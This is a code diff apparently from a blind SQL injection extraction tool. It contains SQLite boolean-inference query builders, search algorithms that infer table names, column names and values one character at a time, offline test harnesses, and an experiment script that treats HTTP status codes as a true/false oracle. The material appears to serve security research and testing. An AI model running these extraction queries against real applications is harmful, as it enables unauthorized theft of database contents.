    def rows_count(self, ctx, n):
        '''Query: is the number of columns lower than n?'''
        return self._all_rows(ctx, f'count(*) < {n}')


    def rows_are_ascii(self, ctx):
        '''Query: are all column names ASCII?'''
        # min() simulates the logical ALL operator. sum() would be non-zero as
        # soon as a single name is ASCII, i.e. it would behave like ANY.
        return self._all_rows(ctx, f'min(name not glob {self._NON_ASCII_GLOB})')


    def row_is_ascii(self, ctx):
        '''Query: is the column name at offset ctx.row ASCII?'''
        return self._one_row(ctx, f'name not glob {self._NON_ASCII_GLOB}')


    def char_is_ascii(self, ctx):
        '''Query: is the next character ASCII?'''
        return self._one_row(ctx, f'{self._next_char(ctx)} not glob {self._NON_ASCII_GLOB}')


    def char(self, ctx, values):
        '''Query: is the next character one of the values?

        Params:
            ctx (Context): extraction context
            values (list): candidate characters, possibly including EOS

        Returns:
            str: normalized query
        '''
        has_eos = EOS in values
        hex_values = ''.join(v for v in values if v != EOS).encode('utf-8').hex()

        expression = f"instr(x'{hex_values}', {self._next_char(ctx)})"
        if not has_eos:
            # At the end of the string substr() yields '', which instr() always
            # finds. Exclude that case when EOS is not among the candidates.
            expression = f'length(name) != {len(ctx.s)} AND {expression}'
        return self._one_row(ctx, expression)


    def char_unicode(self, ctx, n):
        '''Query: is the code point of the next character lower than n?'''
        return self._one_row(ctx, f'unicode({self._next_char(ctx)}) < {n}')


    def string(self, ctx, values=None):
        '''Not implemented. Accepts values so the signature matches UniformQueries.string.'''
        raise NotImplementedError('TODO?')
|
||||
|
||||
|
||||
|
||||
class SQLiteRowsQueries(UniformQueries):
    '''SQLite queries for extracting the values of column ctx.column in table ctx.table.'''

    # Hex-encoded glob pattern "*[^\x01-\x7f]*"; it matches strings containing
    # a non-ASCII character, so "not glob" is true for ASCII-only strings.
    _NON_ASCII_GLOB = "cast(x'2a5b5e012d7f5d2a' as TEXT)"


    def _all_rows(self, ctx, expression):
        '''Builds a normalized query evaluating the expression over all rows of ctx.table.'''
        return self.normalize(f'SELECT {expression} FROM {SQLite.escape(ctx.table)}')


    def _one_row(self, ctx, expression):
        '''Builds a normalized query evaluating the expression for the row at offset ctx.row.'''
        return self.normalize(
            f'SELECT {expression} FROM {SQLite.escape(ctx.table)} LIMIT 1 OFFSET {ctx.row}'
        )


    @staticmethod
    def _next_char(ctx):
        '''SQL expression for the character following the already extracted ctx.s.'''
        return f'substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1)'


    def rows_count(self, ctx, n):
        '''Query: is the number of rows lower than n?'''
        return self._all_rows(ctx, f'count(*) < {n}')


    def rows_are_ascii(self, ctx):
        '''Query: are the column values of all rows ASCII?'''
        # min() simulates the logical ALL operator. sum() would be non-zero as
        # soon as a single value is ASCII, i.e. it would behave like ANY.
        return self._all_rows(
            ctx,
            f'min({SQLite.escape(ctx.column)} not glob {self._NON_ASCII_GLOB})',
        )


    def row_is_ascii(self, ctx):
        '''Query: is the column value at offset ctx.row ASCII?'''
        return self._one_row(ctx, f'{SQLite.escape(ctx.column)} not glob {self._NON_ASCII_GLOB}')


    def char_is_ascii(self, ctx):
        '''Query: is the next character ASCII?'''
        return self._one_row(ctx, f'{self._next_char(ctx)} not glob {self._NON_ASCII_GLOB}')


    def char(self, ctx, values):
        '''Query: is the next character one of the values?

        Params:
            ctx (Context): extraction context
            values (list): candidate characters, possibly including EOS

        Returns:
            str: normalized query
        '''
        has_eos = EOS in values
        hex_values = ''.join(v for v in values if v != EOS).encode('utf-8').hex()

        expression = f"instr(x'{hex_values}', {self._next_char(ctx)})"
        if not has_eos:
            # At the end of the string substr() yields '', which instr() always
            # finds. Exclude that case when EOS is not among the candidates.
            expression = f'length({SQLite.escape(ctx.column)}) != {len(ctx.s)} AND {expression}'
        return self._one_row(ctx, expression)


    def char_unicode(self, ctx, n):
        '''Query: is the code point of the next character lower than n?'''
        return self._one_row(ctx, f'unicode({self._next_char(ctx)}) < {n}')


    def string(self, ctx, values):
        '''Query: is the whole column value one of the values?

        Params:
            ctx (Context): extraction context
            values (list): candidate strings

        Returns:
            str: normalized query
        '''
        hex_values = ','.join(f"x'{v.encode('utf-8').hex()}'" for v in values)
        # the column is cast to BLOB so that it is compared with the hex (BLOB) literals
        return self._one_row(ctx, f'cast({SQLite.escape(ctx.column)} as BLOB) in ({hex_values})')
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
class SQLite(DBMS):
    '''SQLite DBMS: binds the SQLite query builders to the DBMS interface.'''
    # data types offered as candidates when inferring a column's type
    DATA_TYPES = ['INTEGER', 'TEXT', 'REAL', 'NUMERIC', 'BLOB']

    # query builder instances, one per extraction target
    MetaQueries = SQLiteMetaQueries()
    TablesQueries = SQLiteTablesQueries()
    ColumnsQueries = SQLiteColumnsQueries()
    RowsQueries = SQLiteRowsQueries()
|
||||
|
@ -42,19 +42,23 @@ class SearchAlgorithm(metaclass=ABCMeta):
|
||||
|
||||
|
||||
|
||||
class IntExponentialSearch(SearchAlgorithm):
|
||||
'''Exponential search for integers.'''
|
||||
def __init__(self, requester, query_cb, upper=16, correct=None):
|
||||
class IntExponentialBinarySearch(SearchAlgorithm):
|
||||
'''Exponential and binary search for integers.'''
|
||||
def __init__(self, requester, query_cb, lower=0, upper=16, find_range=True, correct=None):
|
||||
'''Constructor.
|
||||
|
||||
Params:
|
||||
requester (Requester): Requester instance
|
||||
query_cb (function): query construction function
|
||||
upper (int): initial upper bound of search range
|
||||
lower (int): lower bound of search range
|
||||
upper (int): upper bound of search range
|
||||
find_range (bool): exponentially expands range until the correct value is within
|
||||
correct (int|None): correct value. If provided, the search is emulated
|
||||
'''
|
||||
super().__init__(requester, query_cb)
|
||||
self.lower = lower
|
||||
self.upper = upper
|
||||
self.find_range = find_range
|
||||
self.correct = correct
|
||||
self.n_queries = 0
|
||||
|
||||
@ -63,22 +67,26 @@ class IntExponentialSearch(SearchAlgorithm):
|
||||
'''Runs the search algorithm.
|
||||
|
||||
Params:
|
||||
ctx (Context): inference context
|
||||
ctx (Context): extraction context
|
||||
|
||||
Returns:
|
||||
int: inferred number
|
||||
'''
|
||||
self.n_queries = 0
|
||||
|
||||
lower, upper = self._get_range(ctx, lower=0, upper=self.upper)
|
||||
if self.find_range:
|
||||
lower, upper = self._find_range(ctx, lower=self.lower, upper=self.upper)
|
||||
else:
|
||||
lower, upper = self.lower, self.upper
|
||||
|
||||
return self._search(ctx, lower, upper)
|
||||
|
||||
|
||||
def _get_range(self, ctx, lower, upper):
|
||||
def _find_range(self, ctx, lower, upper):
|
||||
'''Exponentially expands the search range until the correct value is within.
|
||||
|
||||
Params:
|
||||
ctx (Context): inference context
|
||||
ctx (Context): extraction context
|
||||
lower (int): lower bound
|
||||
upper (int): upper bound
|
||||
|
||||
@ -88,14 +96,14 @@ class IntExponentialSearch(SearchAlgorithm):
|
||||
if self._query(ctx, upper):
|
||||
return lower, upper
|
||||
|
||||
return self._get_range(ctx, upper, upper * 2)
|
||||
return self._find_range(ctx, upper, upper * 2)
|
||||
|
||||
|
||||
def _search(self, ctx, lower, upper):
|
||||
'''Numeric binary search.
|
||||
|
||||
Params:
|
||||
ctx (Context): inference context
|
||||
ctx (Context): extraction context
|
||||
lower (int): lower bound
|
||||
upper (int): upper bound
|
||||
|
||||
@ -108,8 +116,8 @@ class IntExponentialSearch(SearchAlgorithm):
|
||||
middle = (lower + upper) // 2
|
||||
if self._query(ctx, middle):
|
||||
return self._search(ctx, lower, middle)
|
||||
else:
|
||||
return self._search(ctx, middle, upper)
|
||||
|
||||
return self._search(ctx, middle, upper)
|
||||
|
||||
|
||||
def _query(self, ctx, n):
|
||||
@ -118,8 +126,8 @@ class IntExponentialSearch(SearchAlgorithm):
|
||||
if self.correct is None:
|
||||
query_string = self.query_cb(ctx, n)
|
||||
return self.requester.request(ctx, query_string)
|
||||
else:
|
||||
return self.correct < n
|
||||
|
||||
return self.correct < n
|
||||
|
||||
|
||||
|
||||
@ -144,13 +152,12 @@ class BinarySearch(SearchAlgorithm):
|
||||
'''Runs the search algorithm.
|
||||
|
||||
Params:
|
||||
ctx (Context): inference context
|
||||
ctx (Context): extraction context
|
||||
|
||||
Returns:
|
||||
value|None: inferred value or None on fail
|
||||
'''
|
||||
self.n_queries = 0
|
||||
|
||||
return self._search(ctx, self.values)
|
||||
|
||||
|
||||
@ -165,8 +172,8 @@ class BinarySearch(SearchAlgorithm):
|
||||
|
||||
if self._query(ctx, left):
|
||||
return self._search(ctx, left)
|
||||
else:
|
||||
return self._search(ctx, right)
|
||||
|
||||
return self._search(ctx, right)
|
||||
|
||||
|
||||
def _query(self, ctx, values):
|
||||
@ -175,8 +182,8 @@ class BinarySearch(SearchAlgorithm):
|
||||
if self.correct is None:
|
||||
query_string = self.query_cb(ctx, values)
|
||||
return self.requester.request(ctx, query_string)
|
||||
else:
|
||||
return self.correct in values
|
||||
|
||||
return self.correct in values
|
||||
|
||||
|
||||
|
||||
@ -204,13 +211,12 @@ class TreeSearch(SearchAlgorithm):
|
||||
'''Runs the search algorithm.
|
||||
|
||||
Params:
|
||||
ctx (Context): inference context
|
||||
ctx (Context): extraction context
|
||||
|
||||
Returns:
|
||||
value|None: inferred value or None on fail
|
||||
'''
|
||||
self.n_queries = 0
|
||||
|
||||
return self._search(ctx, self.tree, in_tree=self.in_tree)
|
||||
|
||||
|
||||
@ -218,7 +224,7 @@ class TreeSearch(SearchAlgorithm):
|
||||
'''Tree search.
|
||||
|
||||
Params:
|
||||
ctx (Context): inference context
|
||||
ctx (Context): extraction context
|
||||
tree (utils.huffman.Node): Huffman tree to search
|
||||
in_tree (bool): True if the correct value is known to be in the tree
|
||||
|
||||
@ -237,10 +243,11 @@ class TreeSearch(SearchAlgorithm):
|
||||
|
||||
if self._query(ctx, tree.left.values()):
|
||||
return self._search(ctx, tree.left, True)
|
||||
else:
|
||||
if tree.right is None:
|
||||
return None
|
||||
return self._search(ctx, tree.right, in_tree)
|
||||
|
||||
if tree.right is None:
|
||||
return None
|
||||
|
||||
return self._search(ctx, tree.right, in_tree)
|
||||
|
||||
|
||||
def _query(self, ctx, values):
|
||||
@ -249,5 +256,5 @@ class TreeSearch(SearchAlgorithm):
|
||||
if self.correct is None:
|
||||
query_string = self.query_cb(ctx, values)
|
||||
return self.requester.request(ctx, query_string)
|
||||
else:
|
||||
return self.correct in values
|
||||
|
||||
return self.correct in values
|
||||
|
@ -7,8 +7,10 @@ DIR_FILE = os.path.dirname(os.path.realpath(__file__))
|
||||
DIR_ROOT = os.path.abspath(os.path.join(DIR_FILE, '..'))
|
||||
DIR_MODELS = os.path.join(DIR_ROOT, 'data', 'models')
|
||||
|
||||
ASCII_MAX = 0x7f
|
||||
UNICODE_MAX = 0x10ffff
|
||||
|
||||
CHARSET_ASCII = [chr(x) for x in range(128)] + ['</s>']
|
||||
CHARSET_SCHEMA = list(string.ascii_lowercase + string.digits + '_#@') + ['</s>']
|
||||
|
||||
EOS = '</s>'
|
||||
SOS = '<s>'
|
||||
|
@ -12,22 +12,31 @@ DIR_DBS = os.path.abspath(os.path.join(DIR_FILE, 'dbs'))
|
||||
|
||||
class OfflineRequester(Requester):
|
||||
'''Offline requester for testing purposes.'''
|
||||
def __init__(self, db):
|
||||
def __init__(self, db, verbose=False):
|
||||
'''Constructor.
|
||||
|
||||
Params:
|
||||
db (str): name of an .sqlite DB in the "dbs" dir
|
||||
verbose (bool): flag for verbose prints
|
||||
'''
|
||||
db_file = os.path.join(DIR_DBS, f'{db}.sqlite')
|
||||
assert os.path.exists(db_file), f'DB not found: {db_file}'
|
||||
self.db = sqlite3.connect(db_file).cursor()
|
||||
self.verbose = verbose
|
||||
self.n_queries = 0
|
||||
|
||||
|
||||
def request(self, ctx, query):
|
||||
self.n_queries += 1
|
||||
query = f'SELECT cast(({query}) as bool)'
|
||||
return bool(self.db.execute(query).fetchone()[0])
|
||||
|
||||
res = bool(self.db.execute(query).fetchone()[0])
|
||||
|
||||
if self.verbose:
|
||||
print(f'"{ctx.s}"\t{res}\t{query}')
|
||||
|
||||
return res
|
||||
|
||||
|
||||
|
||||
def reset(self):
|
||||
|
7
tests/dbs/unicode.json
Normal file
7
tests/dbs/unicode.json
Normal file
@ -0,0 +1,7 @@
|
||||
{
|
||||
"Ħ€ȽȽ© ŴǑȒȽƉ": [
|
||||
{
|
||||
"Ħ€ȽȽ© ŴǑȒȽƉ": "Ħ€ȽȽ© ŴǑȒȽƉ"
|
||||
}
|
||||
]
|
||||
}
|
BIN
tests/dbs/unicode.sqlite
Normal file
BIN
tests/dbs/unicode.sqlite
Normal file
Binary file not shown.
@ -21,7 +21,7 @@ FILE_LARGE_CONTENT_JSON = os.path.join(DIR_DBS, 'large_content.json')
|
||||
def main():
|
||||
assert len(sys.argv) in [1, 3], 'python3 experiment_generic_db_offline.py [<table> <column>]'
|
||||
|
||||
requester = OfflineRequester(db='large_content')
|
||||
requester = OfflineRequester(db='large_content', verbose=False)
|
||||
ext = Extractor(requester=requester, dbms=SQLite())
|
||||
|
||||
if len(sys.argv) == 3:
|
||||
@ -60,58 +60,58 @@ if __name__ == '__main__':
|
||||
# {
|
||||
# "users": {
|
||||
# "username": [
|
||||
# 42124,
|
||||
# 5.738182808881624
|
||||
# 42125,
|
||||
# 5.738319030104891
|
||||
# ],
|
||||
# "first_name": [
|
||||
# 27901,
|
||||
# 4.882919145957298
|
||||
# 27902,
|
||||
# 4.883094154707735
|
||||
# ],
|
||||
# "last_name": [
|
||||
# 32701,
|
||||
# 5.344173884621671
|
||||
# 32702,
|
||||
# 5.344337310017977
|
||||
# ],
|
||||
# "sex": [
|
||||
# 1608,
|
||||
# 0.3216
|
||||
# 1609,
|
||||
# 0.3218
|
||||
# ],
|
||||
# "email": [
|
||||
# 78138,
|
||||
# 3.7532062058696383
|
||||
# 78139,
|
||||
# 3.7532542389163743
|
||||
# ],
|
||||
# "password": [
|
||||
# 137115,
|
||||
# 4.28484375
|
||||
# 137116,
|
||||
# 4.284875
|
||||
# ],
|
||||
# "address": [
|
||||
# 86872,
|
||||
# 2.1946795341434453
|
||||
# 86873,
|
||||
# 2.1947047975140843
|
||||
# ]
|
||||
# },
|
||||
# "posts": {
|
||||
# "text": [
|
||||
# 409302,
|
||||
# 4.312482220185226
|
||||
# 409303,
|
||||
# 4.312492756371759
|
||||
# ]
|
||||
# },
|
||||
# "comments": {
|
||||
# "text": [
|
||||
# 346373,
|
||||
# 3.920464063384267
|
||||
# 346374,
|
||||
# 3.9204753820033957
|
||||
# ]
|
||||
# },
|
||||
# "products": {
|
||||
# "name": [
|
||||
# 491174,
|
||||
# 3.8737341871983344
|
||||
# 491175,
|
||||
# 3.873742073882457
|
||||
# ],
|
||||
# "category": [
|
||||
# 6721,
|
||||
# 0.42975893599334997
|
||||
# 6753,
|
||||
# 0.4318051026280453
|
||||
# ],
|
||||
# "description": [
|
||||
# 966309,
|
||||
# 3.2259549579023976
|
||||
# 966310,
|
||||
# 3.2259582963324007
|
||||
# ]
|
||||
# }
|
||||
# }
|
||||
|
@ -27,3 +27,8 @@ def main():
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
||||
|
||||
|
||||
# Expected results:
|
||||
# Total requests: 27376
|
||||
# Average RPC: 2.2098805295447206
|
@ -25,13 +25,17 @@ class R(Requester):
|
||||
|
||||
r = requests.get(url)
|
||||
assert r.status_code in [200, 404], f'Unexpected response code: {r.status_code}'
|
||||
|
||||
# print(ctx.s, r.status_code == 200, query)
|
||||
return r.status_code == 200
|
||||
|
||||
|
||||
|
||||
def main():
|
||||
assert len(sys.argv) == 4, 'python3 experiment_generic_db.py <dbms> <table> <column>'
|
||||
_, dbms_type, table, column = sys.argv
|
||||
assert len(sys.argv) >= 2, 'python3 experiment_generic_db.py <dbms> [<table> <column>]'
|
||||
argv = sys.argv + [None, None]
|
||||
_, dbms_type, table, column = argv[:4]
|
||||
|
||||
allowed = ['sqlite', 'mysql']
|
||||
assert dbms_type in allowed, f'dbms must be in {allowed}'
|
||||
|
||||
@ -39,10 +43,12 @@ def main():
|
||||
dbms = SQLite() if dbms_type == 'sqlite' else MySQL()
|
||||
ext = Extractor(requester, dbms)
|
||||
|
||||
res = ext.extract_schema(metadata=True)
|
||||
print(json.dumps(res, indent=4))
|
||||
res = ext.extract_column(table, column)
|
||||
print(json.dumps(res, indent=4))
|
||||
if table is None:
|
||||
res = ext.extract_schema(strategy='model', metadata=True)
|
||||
print(json.dumps(res, indent=4))
|
||||
else:
|
||||
res = ext.extract_column(table, column)
|
||||
print(json.dumps(res, indent=4))
|
||||
|
||||
|
||||
|
||||
|
29
tests/test_small_schema.py
Normal file
29
tests/test_small_schema.py
Normal file
@ -0,0 +1,29 @@
|
||||
import json
|
||||
import logging
|
||||
|
||||
from hakuin.dbms import SQLite
|
||||
from hakuin import Extractor
|
||||
|
||||
from OfflineRequester import OfflineRequester
|
||||
|
||||
|
||||
|
||||
logging.basicConfig(level=logging.INFO)
|
||||
|
||||
|
||||
|
||||
def main():
|
||||
requester = OfflineRequester(db='large_content')
|
||||
ext = Extractor(requester=requester, dbms=SQLite())
|
||||
|
||||
res = ext.extract_schema(metadata=True)
|
||||
print(json.dumps(res, indent=4))
|
||||
|
||||
res_len = sum([len(table) for table in res])
|
||||
res_len += sum([len(column) for table, columns in res.items() for column in columns])
|
||||
print('Total requests:', requester.n_queries)
|
||||
print('Average RPC:', requester.n_queries / res_len)
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
28
tests/test_unicode.py
Normal file
28
tests/test_unicode.py
Normal file
@ -0,0 +1,28 @@
|
||||
import json
|
||||
import logging
|
||||
|
||||
import hakuin
|
||||
from hakuin import Extractor
|
||||
from hakuin.dbms import SQLite
|
||||
|
||||
from OfflineRequester import OfflineRequester
|
||||
|
||||
|
||||
|
||||
logging.basicConfig(level=logging.INFO)
|
||||
|
||||
|
||||
|
||||
def main():
|
||||
requester = OfflineRequester(db='unicode', verbose=False)
|
||||
ext = Extractor(requester=requester, dbms=SQLite())
|
||||
|
||||
res = ext.extract_schema(strategy='binary')
|
||||
print(res)
|
||||
|
||||
res = ext.extract_column('Ħ€ȽȽ©', 'ŴǑȒȽƉ')
|
||||
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
Loading…
Reference in New Issue
Block a user